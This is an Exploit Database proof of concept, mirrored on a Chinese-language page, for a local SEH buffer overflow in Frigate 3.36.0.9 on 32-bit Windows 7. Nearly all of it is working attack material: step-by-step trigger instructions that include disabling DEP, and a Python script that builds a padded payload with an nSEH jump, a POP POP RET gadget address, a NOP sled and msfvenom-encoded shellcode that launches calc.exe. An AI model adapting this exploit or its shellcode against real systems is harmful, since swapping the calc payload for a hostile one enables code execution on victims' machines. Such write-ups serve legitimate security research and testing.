Frigate 3.36.0.9 – ‘Command Line’ Local Buffer Overflow (SEH) (PoC)

• Exploit Database
• 17 阅读

• 作者： Paras Bhatia
  日期： 2020-06-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48563/

• # Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) 
  # Vendor Homepage: http://www.frigate3.com/ 
  # Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
  # Exploit Author: Paras Bhatia
  # Discovery Date: 2020-06-07
  # Vulnerable Software: Frigate
  # Version: <= 3.36.0.9
  # Vulnerability Type: Local Buffer Overflow
  # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
  
  #Steps to Produce the Crash:
  
  # 1.- Run python code: FrigateLCE.py
  # 2.- Copy content to clipboard
  # 3.- Turn off DEP for Frigate3.exe
  # 4.- Open "Frigate3.exe"
  # 5.- Go to "Command" > "Command Line" > "Activate Command Line"
  # 6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application.
  # 7.- Press Enter from Keyboard.
  # 7.- Click on OK in the dialog box that appears.
  # 8.- Calc.exe runs.
  
  
  #################################################################################################################################################
  
  #Python "FrigateLCE.py" Code:
  
  f= open("FrigateLCE.txt", "w")
  
  junk="A" * 4112
  
  nseh="\xeb\x20\x90\x90"
  
  seh="\x4B\x0C\x01\x40"
  
  #40010C4B 5B POP EBX
  #40010C4C 5D POP EBP
  #40010C4D C3 RETN
  #POP EBX ,POP EBP, RETN | [rtl60.bpl](C:\Program Files\Frigate3\rtl60.bpl)
  
  nops="\x90" * 50
  
  # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d"-f python
  
  buf =""
  buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
  buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
  buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
  buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
  buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
  buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
  buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
  buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
  buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
  buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
  buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
  buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
  buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
  buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
  buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
  buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
  buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"
  
  
  
  
  payload = junk + nseh + seh + nops + buf
  
  f.write(payload)
  f.close